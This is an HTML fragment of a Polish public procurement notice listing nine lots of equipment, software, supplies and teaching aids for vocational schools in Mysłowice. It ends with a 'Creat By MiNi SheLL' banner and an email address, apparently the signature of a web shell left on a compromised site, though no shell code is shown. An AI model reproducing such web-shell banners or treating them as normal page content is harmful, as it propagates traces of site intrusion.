<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 1 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- jednostka centralna - 15 szt.,
- monitor - 15 szt.,
- serwer - 1 szt.,
- UPS - 1 szt.,
- drukarka - 1 szt.,
- projektor multimedialny - 1 szt.
Wymagane minimalne parametry techniczne oraz szczególne wymagania wobec przedmiotu zamówienia stanowiącego część nr 1 - zostały określone w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam
pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- jednostka centralna - 17 szt.,
- monitor - 17 szt.,
- projektor multimedialny - 1 szt.,
- urządzenie wielofunkcyjne - 1 szt.,
- Router Wi-fi - 1 szt.,
- czytnik kodów kreskowych - 1 szt.
Wymagane minimalne parametry techniczne oraz szczególne wymagania wobec przedmiotu zamówienia stanowiącego część nr 2 - zostały określone w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup dostawa i montaż pracowni języków obcych dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam
pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup dostawa i montaż pracowni języków obcych dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym cyfrowa pracownia języków obcych 
na 16 stanowisk uczniowskich + 1 nauczyciel wraz z dostawą, montażem i szkoleniem dla nauczyciela:
- zestaw komputerowy - 1 szt.,
- moduł/moduły umożliwiający/umożliwiające podłączenie systemu do komputera przez USB - 1 lub 16 szt.,
- aplikacja do sterowania pracownią z komputera - 1 szt.,
- aplikacja do odtwarzania i rejestracji dźwięków - 1 szt.,
- przyłącza stanowisk uczniowskich - 16 szt.,
- słuchawki z wbudowanym dynamicznym mikrofonem - 17 szt.,
- okablowanie - 17 szt., 
- biurko nauczycielskie z szafką na komputer i dokumenty - 1 szt.,
- stoły uczniowskie - 8 lub 16 szt.
opcjonalnie 16 jednoosobowych/8 dwuosobowych,
- krzesła - 17 szt.,
- projektor multimedialny - 1 szt.
Minimalne funkcje realizowane w pracowni oraz wymagania dodatkowe przedmiotu zamówienia stanowiącego część nr 3 - zostały określone w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa oprogramowania komputerowego w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa oprogramowania komputerowego w ramach projektu Mam zawód - mam pracę w regionie: 
w ramach licencji Zamawiający wymaga kart licencji w języku polskim, nośników plików instalacyjnych, instrukcję instalacji. Zamawiane oprogramowanie przeznaczone jest do zestawów komputerowych bez ograniczeń czasowych z możliwością przenoszenia między stanowiskami.
Opis przedmiotu zamówienia stanowiącego część nr 4 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa materiałów biurowych w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa materiałów biurowych w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- kalkulator - 50 szt.,
- aparat telefoniczny - 1 szt.,
- ołówek - 50 szt.,
- wizytownik - 1 szt.,
- tablica - 1 szt.,
- papier Flipchart - 5 szt.,
- druki akcydensowe wykorzystywane w handlu:
- faktura VAT - 40 szt.,
- faktura korygująca - 20 szt.,
- nota korygująca - 20 szt.,
- rachunek dla zwolnionych podmiotowo z VAT - 20 szt.,
- zamówienie ogólne - 10 szt.,
- Wz/wydanie na zewnątrz - 10 szt.,
- Pz/przyjęcie z zewnątrz - 10 szt.,
- druki akcydensowe wykorzystywane w handlu:
- faktura VAT - 20 szt.,
- faktura korygująca - 10 szt.,
- nota korygująca - 10 szt.,
- arkusz spisu z natury - 10 szt.,
- zgłoszenie reklamacyjne - 10 szt.,
- kartoteki magazynowe - 10 opak.,
- Wz/wydanie na zewnątrz - 10 szt.,
- Pz/przyjęcie z zewnątrz - 10 szt.,
- druki akcydensowe wykorzystywane w zatrudnieniu:
- umowa o pracę - 20 szt.,
- umowa zlecenie - 20 szt.,
- świadectwo pracy - 20 szt.,
- druki akcydensowe stosowane w wymianie towarowej:
- faktura VAT - 49 szt.,
- międzynarodowy list przewozowy CMR - 49 szt.,
- Wz/wydanie na zewnątrz - 49 szt.,
- Pz/przyjęcie z zewnątrz - 49 szt.,
- torebki foliowe - 1 opak.,
- blok - 1 szt.,
- klej - 1 szt.,
- papier pakowy - 1 szt.,
- nożyczki - 1 szt.,
- taśma samoprzylepna - 1 szt.,
- gumka - 1 szt.,
- linijka - 1 szt.,
- marker - 2 szt.,
- komplet przyborów kreślarskich - 10 komp.,
- karta biblioteczna do wydruku kodów kreskowych - 10 szt.,
- zestaw nalepek do wydruku kodów kreskowych - 6 szt.
Opis przedmiotu zamówienia stanowiącego część nr 5 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych na potrzeby zawodu sprzedawca w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa pomocy dydaktycznych na potrzeby zawodu sprzedawca w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- metkownica - 2 szt.,
- ulotnik pionowy - 2 szt.,
- ulotnik poziomy - 1 szt.,
- stojak - 2 szt.,
- cenówka - 1 opak.,
- tester banknotów - 2 szt.
Opis przedmiotu zamówienia stanowiącego część nr 6 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych - sprzętu elektronicznego w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa pomocy dydaktycznych - sprzętu elektronicznego w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- zarabiarka gniazd RJ45 - 3 szt.,
- zarabiarka wtyków RJ45 - 12 szt.,
- tester napięcia - 3 szt.,
- tester płyt głównych P.O.S.T. ISA - 4 szt.,
- tester zasilaczy ATX - 4 szt.,
- tester kabli - 4 szt.,
- mierniki elektryczne - 15 szt.,
- listwa zasilająca - 1 szt.,
- pendrive - 1 szt.,
- ekran projekcyjny ścienny - 4 szt.,
- ekran projekcyjny na statywie - 1 szt.,
- słuchawki z mikrofonem - 30 szt.
Opis przedmiotu zamówienia stanowiącego część nr 7 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakup i dostawa książek, prasy oraz filmów DVD w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa książek, prasy oraz filmów DVD w ramach projektu Mam zawód - mam pracę w regionie, 
w tym:
- mapa - 3 szt.,
- zestaw plansz dydaktycznych - 1 szt.,
- film szkoleniowy - 2 szt.,
- ćwiczenia - 15 szt.,
- czasopismo - 48 szt.,
- film edukacyjno-szkoleniowy - 4 szt.,
- podręcznik - 211 szt.,
- testy - 8 szt.,
- tablica demonstracyjna - 5 szt.,
- zestaw edukacyjny - 5 szt.
Opis przedmiotu zamówienia stanowiącego część nr 8 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych - narzędzi budowlanych w ramach projektu Mam zawód - mam pracę w regionie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa pomocy dydaktycznych - narzędzi budowlanych w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- komplet akcesoriów budowlanych - 1 komplet (w tym: poziomica, szpachla, kielnia trójkątna, pędzel, wałek, paca, pojemnik budowlany, wiadro, piła, sznurek murarski po - 1 szt.),
- elektronarzędzia budowlane: szlifierka kątowa - 1 szt.,
- elektronarzędzia budowlane: wiertarko-wkrętarka - 1 szt.,
- elektronarzędzia budowlane: mieszadło - 1 szt.,
- narzędzia budowlane: przecinarka do glazury - 2 szt.,
- komplet akcesoriów budowlanych na lekcje pokazowe - 2 komplety (w tym: cegła klinkierowa - 3 szt., płyta k-g - 1 szt., płyta osb - 1 szt., tapeta - 2 rolki, płytka elewacyjna - 1 m2, glazura - 1 m2, bloczek betonowy 
- 1 szt., profil ścienny U - 1 paczka, stelaż do montażu płyt - 1 szt.). 
Opis przedmiotu zamówienia stanowiącego część nr 9 - został określony w zał. nr 12 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com